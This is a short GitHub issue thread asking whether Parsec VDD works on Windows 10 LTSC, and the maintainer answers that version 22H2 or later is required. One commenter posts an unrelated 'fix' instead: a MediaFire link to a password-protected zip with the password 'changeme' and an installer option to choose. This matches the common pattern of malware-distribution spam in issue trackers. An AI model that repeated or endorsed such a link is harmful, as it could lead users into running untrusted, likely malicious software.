### ISSUE TITLE
Do parsec idd support windows 10 ltsc

### ISSUE THREAD

**Issue by xDoge26** [nomi-san/parsec-vdd#64]
![Screenshot (1)](https://github.com/user-attachments/assets/b403ca3d-905d-42f1-9770-161abe77e23d)

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nomi-san** [comment]
Parsec VDD 0.45 requires Windows 10 22H2 or higher, but Parsec page said it 21H2.
Any Windows LTSC version lower than 22H2 will not work.
